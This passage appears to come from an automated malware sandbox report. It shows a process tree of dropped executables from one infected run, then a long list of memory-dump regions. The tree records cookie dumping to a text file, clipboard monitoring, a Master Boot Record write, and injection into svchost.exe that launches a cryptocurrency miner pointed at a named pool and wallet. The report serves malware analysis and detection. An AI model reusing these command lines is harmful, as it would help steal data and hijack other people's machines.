                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                              • Executes dropped EXE
                                              PID:2740
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                              • Executes dropped EXE
                                              PID:200
                                          • C:\Users\Admin\AppData\Local\Temp\779E.exe
                                            C:\Users\Admin\AppData\Local\Temp\779E.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Drops startup file
                                            PID:5016
                                            • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                              "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: AddClipboardFormatListener
                                              PID:1684
                                          • C:\Windows\SysWOW64\hijmifiu\uuvgbcai.exe
                                            C:\Windows\SysWOW64\hijmifiu\uuvgbcai.exe /d"C:\Users\Admin\uthjxuvn.exe"
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4288
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              2⤵
                                              • Drops file in System32 directory
                                              • Modifies service
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              PID:4528
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                                                3⤵
                                                  PID:4812
                                            • C:\Users\Admin\AppData\Local\Temp\9C7C.exe
                                              C:\Users\Admin\AppData\Local\Temp\9C7C.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:1368
                                            • C:\Users\Admin\AppData\Local\Temp\E1F3.exe
                                              C:\Users\Admin\AppData\Local\Temp\E1F3.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Writes to the Master Boot Record (MBR)
                                              PID:4484
                                            • C:\Users\Admin\AppData\Local\5bd90af8-5288-4392-9437-008294739710\E31.exe
                                              C:\Users\Admin\AppData\Local\5bd90af8-5288-4392-9437-008294739710\E31.exe --Task
                                              1⤵
                                              • Executes dropped EXE
                                              PID:4596

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • memory/400-234-0x0000000009A70000-0x0000000009A71000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-254-0x000000000A760000-0x000000000A761000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-220-0x0000000006430000-0x0000000006431000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-223-0x0000000006830000-0x0000000006831000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-226-0x00000000065C0000-0x00000000065E3000-memory.dmp

                                              Filesize

                                              140KB

                                              Download

                                            • memory/400-227-0x0000000008D50000-0x0000000008D51000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-228-0x0000000008C70000-0x0000000008C92000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/400-224-0x00000000706E0000-0x0000000070DCE000-memory.dmp

                                              Filesize

                                              6.9MB

                                              Download

                                            • memory/400-229-0x0000000009250000-0x0000000009251000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-230-0x0000000009860000-0x0000000009861000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-231-0x00000000098A0000-0x00000000098A1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-232-0x00000000098F0000-0x00000000098F1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-255-0x000000000A930000-0x000000000A931000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-263-0x000000000C460000-0x000000000C461000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-261-0x000000000B410000-0x000000000B411000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-258-0x000000000AF50000-0x000000000AF51000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-260-0x000000000B0A0000-0x000000000B0A1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/400-259-0x000000000B010000-0x000000000B011000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/728-115-0x00000188A0C60000-0x00000188A0C61000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/728-117-0x0000000010000000-0x00000000100B9000-memory.dmp

                                              Filesize

                                              740KB

                                              Download

                                            • memory/756-136-0x0000000000820000-0x0000000000821000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/776-88-0x00007FFF83CE0000-0x00007FFF83D5E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/1316-83-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/1332-113-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/1360-109-0x00007FFF83CE0000-0x00007FFF83D5E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/1368-397-0x0000000005230000-0x0000000005231000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1432-221-0x0000000006370000-0x0000000006371000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1460-155-0x0000000004DA0000-0x0000000004DA1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1532-248-0x0000000006370000-0x0000000006371000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1572-266-0x00000000006AE000-0x00000000006AF000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1572-187-0x00000000022E0000-0x00000000022E1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1684-409-0x00000000064C0000-0x00000000064C1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1708-179-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1708-403-0x0000000005F40000-0x0000000005F41000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1708-402-0x0000000006740000-0x0000000006741000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1708-401-0x0000000005F40000-0x0000000005F41000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1864-267-0x000000000068E000-0x000000000068F000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/1864-194-0x00000000021F0000-0x00000000021F1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2044-190-0x0000000006300000-0x0000000006301000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2092-141-0x0000000001030000-0x0000000001046000-memory.dmp

                                              Filesize

                                              88KB

                                              Download

                                            • memory/2092-262-0x0000000004DB0000-0x0000000004DC7000-memory.dmp

                                              Filesize

                                              92KB

                                              Download

                                            • memory/2092-247-0x0000000002FD0000-0x0000000002FE6000-memory.dmp

                                              Filesize

                                              88KB

                                              Download

                                            • memory/2096-185-0x00000000021A0000-0x00000000021A1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2184-93-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2444-102-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2492-61-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2492-74-0x0000000003E10000-0x0000000004273000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/2556-49-0x0000000010000000-0x0000000010220000-memory.dmp

                                              Filesize

                                              2.1MB

                                              Download

                                            • memory/2556-45-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/2776-225-0x0000000000940000-0x0000000000941000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2828-32-0x0000000071680000-0x0000000071D6E000-memory.dmp

                                              Filesize

                                              6.9MB

                                              Download

                                            • memory/2828-35-0x000000000EAC0000-0x000000000EAC1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2828-37-0x0000000010B40000-0x0000000010B41000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2828-30-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/3356-41-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/3408-195-0x00000000021B0000-0x00000000021B1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/3476-59-0x0000000072B60000-0x0000000072BF3000-memory.dmp

                                              Filesize

                                              588KB

                                              Download

                                            • memory/3476-73-0x0000000003E50000-0x00000000042B3000-memory.dmp

                                              Filesize

                                              4.4MB

                                              Download

                                            • memory/3548-96-0x00007FFF83CE0000-0x00007FFF83D5E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/3684-272-0x0000000006330000-0x0000000006331000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/3684-273-0x0000000006330000-0x0000000006331000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/3868-77-0x00007FFF83CE0000-0x00007FFF83D5E000-memory.dmp

                                              Filesize

                                              504KB

                                              Download

                                            • memory/3868-78-0x0000000010000000-0x0000000010057000-memory.dmp

                                              Filesize

                                              348KB

                                              Download

                                            • memory/4064-127-0x0000000004E60000-0x0000000004E64000-memory.dmp

                                              Filesize

                                              16KB

                                              Download

                                            • memory/4288-385-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4484-399-0x0000000006370000-0x0000000006371000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4484-400-0x0000000006370000-0x0000000006371000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/4520-250-0x0000000000400000-0x000000000040C000-memory.dmp

                                              Filesize

                                              48KB

                                              Download

                                            • memory/4528-412-0x0000000000B00000-0x0000000000B10000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/4528-415-0x0000000002BF0000-0x0000000002BF7000-memory.dmp

                                              Filesize

                                              28KB

                                              Download

                                            • memory/4528-414-0x0000000008E50000-0x000000000925B000-memory.dmp

                                              Filesize

                                              4.0MB

                                              Download

                                            • memory/4528-413-0x0000000002BE0000-0x0000000002BE5000-memory.dmp

                                              Filesize

                                              20KB

                                              Download

                                            • memory/4528-387-0x00000000008D0000-0x00000000008E5000-memory.dmp

                                              Filesize

                                              84KB

                                              Download

                                            • memory/4528-411-0x0000000000900000-0x0000000000906000-memory.dmp

                                              Filesize

                                              24KB

                                              Download

                                            • memory/4528-410-0x0000000004840000-0x0000000004A4F000-memory.dmp

                                              Filesize

                                              2.1MB

                                              Download

                                            • memory/4812-416-0x0000000002E00000-0x0000000002EF1000-memory.dmp

                                              Filesize

                                              964KB

                                              Download

                                            • memory/4904-270-0x00000000021B0000-0x00000000021B1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/5016-393-0x00000000064B0000-0x00000000064B1000-memory.dmp

                                              Filesize

                                              4KB

                                              Download